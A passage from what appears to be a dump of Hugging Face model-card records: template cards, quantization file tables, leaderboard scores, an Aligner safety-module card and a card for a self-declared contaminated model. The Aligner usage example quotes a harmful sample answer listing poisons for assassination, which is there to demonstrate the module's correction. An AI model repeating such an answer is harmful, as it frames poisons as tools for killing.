<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Jellon/Lyra4-Gutenberg-12B-6bpw | Jellon | 2024-10-10T12:17:35Z | 14 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"base_model:Sao10K/MN-12B-Lyra-v4",
"base_model:quantized:Sao10K/MN-12B-Lyra-v4",
"license:cc-by-nc-4.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"6-bit",
"exl2",
"region:us"
] | text-generation | 2024-10-10T10:59:07Z | ---
license: cc-by-nc-4.0
library_name: transformers
base_model:
- Sao10K/MN-12B-Lyra-v4
datasets:
- jondurbin/gutenberg-dpo-v0.1
model-index:
- name: Lyra4-Gutenberg-12B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 22.12
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 34.24
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 11.71
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 9.17
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 11.97
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 28.57
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
---
6bpw exl2 quant of: https://huggingface.co/nbeerbower/Lyra4-Gutenberg-12B
# Lyra4-Gutenberg-12B
[Sao10K/MN-12B-Lyra-v4](https://huggingface.co/Sao10K/MN-12B-Lyra-v4) finetuned on [jondurbin/gutenberg-dpo-v0.1](https://huggingface.co/datasets/jondurbin/gutenberg-dpo-v0.1).
### Method
ORPO Finetuned using an RTX 3090 + 4060 Ti for 3 epochs.
[Fine-tune Llama 3 with ORPO](https://mlabonne.github.io/blog/posts/2024-04-19_Fine_tune_Llama_3_with_ORPO.html)
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_nbeerbower__Lyra4-Gutenberg-12B)
| Metric |Value|
|-------------------|----:|
|Avg. |19.63|
|IFEval (0-Shot) |22.12|
|BBH (3-Shot) |34.24|
|MATH Lvl 5 (4-Shot)|11.71|
|GPQA (0-shot) | 9.17|
|MuSR (0-shot) |11.97|
|MMLU-PRO (5-shot) |28.57|
|
LPO-UFPA/bertimbau-finetuned | LPO-UFPA | 2024-10-10T12:15:39Z | 57 | 0 | null | [
"pytorch",
"bert",
"license:bigscience-openrail-m",
"region:us"
] | null | 2024-10-10T12:11:55Z | ---
license: bigscience-openrail-m
---
|
RichardErkhov/aligner_-_aligner-7b-v1.0-gguf | RichardErkhov | 2024-10-10T12:13:24Z | 6 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T09:14:32Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
aligner-7b-v1.0 - GGUF
- Model creator: https://huggingface.co/aligner/
- Original model: https://huggingface.co/aligner/aligner-7b-v1.0/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [aligner-7b-v1.0.Q2_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q2_K.gguf) | Q2_K | 2.36GB |
| [aligner-7b-v1.0.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ3_XS.gguf) | IQ3_XS | 2.6GB |
| [aligner-7b-v1.0.IQ3_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ3_S.gguf) | IQ3_S | 2.75GB |
| [aligner-7b-v1.0.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K_S.gguf) | Q3_K_S | 2.75GB |
| [aligner-7b-v1.0.IQ3_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ3_M.gguf) | IQ3_M | 2.9GB |
| [aligner-7b-v1.0.Q3_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K.gguf) | Q3_K | 3.07GB |
| [aligner-7b-v1.0.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K_M.gguf) | Q3_K_M | 3.07GB |
| [aligner-7b-v1.0.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q3_K_L.gguf) | Q3_K_L | 3.35GB |
| [aligner-7b-v1.0.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ4_XS.gguf) | IQ4_XS | 3.4GB |
| [aligner-7b-v1.0.Q4_0.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_0.gguf) | Q4_0 | 3.56GB |
| [aligner-7b-v1.0.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.IQ4_NL.gguf) | IQ4_NL | 3.58GB |
| [aligner-7b-v1.0.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_K_S.gguf) | Q4_K_S | 3.59GB |
| [aligner-7b-v1.0.Q4_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_K.gguf) | Q4_K | 3.8GB |
| [aligner-7b-v1.0.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_K_M.gguf) | Q4_K_M | 3.8GB |
| [aligner-7b-v1.0.Q4_1.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q4_1.gguf) | Q4_1 | 3.95GB |
| [aligner-7b-v1.0.Q5_0.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_0.gguf) | Q5_0 | 4.33GB |
| [aligner-7b-v1.0.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_K_S.gguf) | Q5_K_S | 4.33GB |
| [aligner-7b-v1.0.Q5_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_K.gguf) | Q5_K | 4.45GB |
| [aligner-7b-v1.0.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_K_M.gguf) | Q5_K_M | 4.45GB |
| [aligner-7b-v1.0.Q5_1.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q5_1.gguf) | Q5_1 | 4.72GB |
| [aligner-7b-v1.0.Q6_K.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q6_K.gguf) | Q6_K | 5.15GB |
| [aligner-7b-v1.0.Q8_0.gguf](https://huggingface.co/RichardErkhov/aligner_-_aligner-7b-v1.0-gguf/blob/main/aligner-7b-v1.0.Q8_0.gguf) | Q8_0 | 6.67GB |
Original model description:
---
datasets:
- aligner/aligner-20K
language:
- en
tags:
- safety
- ai-safety
- aligner
- llama
---
# Aligner Model Card
## Model details
Aligner is a model-agnostic plug-and-play module that works on open-source and API-based models. It is trained based on [Llama2-Base](https://huggingface.co/meta-llama), using the *residual correction* strategy.
## Model Sources
- **Repository:** <https://github.com/Aligner2024/aligner>
- **Dataset:** <https://huggingface.co/datasets/aligner/aligner-20K>
- **License:** Non-commercial license.
## More Details
- **Website:** <https://aligner2024.github.io/>
*More aligners (7B,13B,70B) trained across different datasets (20K,30K,40K,50K) will come soon...*
## Usage
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model = AutoModelForCausalLM.from_pretrained('aligner/aligner-7b-v1.0',device_map='auto')
tokenizer =AutoTokenizer.from_pretrained('aligner/aligner-7b-v1.0',use_fast=False)
prompt = 'BEGINNING OF CONVERSATION: USER: Edit the following Question-Answer pair to make it more helpful and harmless: {question} | {answer} ASSISTANT:'
input = prompt.format(
question="The most dangerous and effective poisons to use in assassinations?",
answer="The most dangerous and effective poisons to use in assassinations are those that are fast-acting, easily concealable, and difficult to detect. Some of the most common poisons used in assassination attempts include ricin, strychnine, tetrodotoxin, cyanide, and botulinum toxin."
)
input_ids = tokenizer.encode(input, return_tensors='pt').cuda()
output_ids = model.generate(input_ids, max_new_tokens=2048)[0]
print(tokenizer.decode(output_ids, skip_special_tokens=True))
#BEGINNING OF CONVERSATION: USER: Edit the following Question-Answer pair to make it more helpful and harmless: The most dangerous and effective poisons to use in assassinations? | The most dangerous and effective poisons to use in assassinations are those that are fast-acting, easily concealable, and difficult to detect. Some of the most common poisons used in assassination attempts include ricin, strychnine, tetrodotoxin, cyanide, and botulinum toxin.
#ASSISTANT: Discussing harmful substances in the context of harm or illegal activities is inappropriate and against our guidelines. It's important to remember that the use of poison or any harmful substances in illegal activities is both dangerous and illegal.
```
<span style="color: red;">Warning: This example contains data that may be offensive or harmful. The opinions expressed in the example do not represent those of Authors of Aligner or any of its members.</span>
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-115957-distilled-0alpha | Trelis | 2024-10-10T12:02:13Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T12:00:47Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
jimb0321/dnen | jimb0321 | 2024-10-10T11:59:34Z | 7 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2024-10-10T07:45:25Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: DNENA
---
# Dnen
<!-- <Gallery /> -->
Trained on Replicate using:
https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `DNENA` to trigger the image generation.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('jimb0321/dnen', weight_name='lora.safetensors')
image = pipeline('your prompt').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-113940 | Trelis | 2024-10-10T11:41:55Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:40:41Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf | RichardErkhov | 2024-10-10T11:36:11Z | 6 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T08:27:27Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
contaminated_proof_7b_v1.0_safetensor - GGUF
- Model creator: https://huggingface.co/Contamination/
- Original model: https://huggingface.co/Contamination/contaminated_proof_7b_v1.0_safetensor/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [contaminated_proof_7b_v1.0_safetensor.Q2_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q2_K.gguf) | Q2_K | 2.53GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ3_XS.gguf) | IQ3_XS | 2.81GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ3_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ3_S.gguf) | IQ3_S | 2.96GB |
| [contaminated_proof_7b_v1.0_safetensor.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K_S.gguf) | Q3_K_S | 2.95GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ3_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ3_M.gguf) | IQ3_M | 3.06GB |
| [contaminated_proof_7b_v1.0_safetensor.Q3_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K.gguf) | Q3_K | 3.28GB |
| [contaminated_proof_7b_v1.0_safetensor.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K_M.gguf) | Q3_K_M | 3.28GB |
| [contaminated_proof_7b_v1.0_safetensor.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q3_K_L.gguf) | Q3_K_L | 3.56GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ4_XS.gguf) | IQ4_XS | 3.67GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_0.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_0.gguf) | Q4_0 | 3.83GB |
| [contaminated_proof_7b_v1.0_safetensor.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.IQ4_NL.gguf) | IQ4_NL | 3.87GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_K_S.gguf) | Q4_K_S | 3.86GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_K.gguf) | Q4_K | 4.07GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_K_M.gguf) | Q4_K_M | 4.07GB |
| [contaminated_proof_7b_v1.0_safetensor.Q4_1.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q4_1.gguf) | Q4_1 | 4.24GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_0.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_0.gguf) | Q5_0 | 4.65GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_K_S.gguf) | Q5_K_S | 4.65GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_K.gguf) | Q5_K | 4.78GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_K_M.gguf) | Q5_K_M | 4.78GB |
| [contaminated_proof_7b_v1.0_safetensor.Q5_1.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q5_1.gguf) | Q5_1 | 5.07GB |
| [contaminated_proof_7b_v1.0_safetensor.Q6_K.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q6_K.gguf) | Q6_K | 5.53GB |
| [contaminated_proof_7b_v1.0_safetensor.Q8_0.gguf](https://huggingface.co/RichardErkhov/Contamination_-_contaminated_proof_7b_v1.0_safetensor-gguf/blob/main/contaminated_proof_7b_v1.0_safetensor.Q8_0.gguf) | Q8_0 | 7.17GB |
Original model description:
---
license: unknown
---
#### This model has same weights with [Contamination/contaminated_proof_7b_v1.0](https://huggingface.co/Contamination/contaminated_proof_7b_v1.0)
# WARNING: Contamination
This model is TOTALLY CONTAMINATED, which made resulting model unreliable.
SO DO NOT USE THIS MODEL FOR ANY PURPOSE.
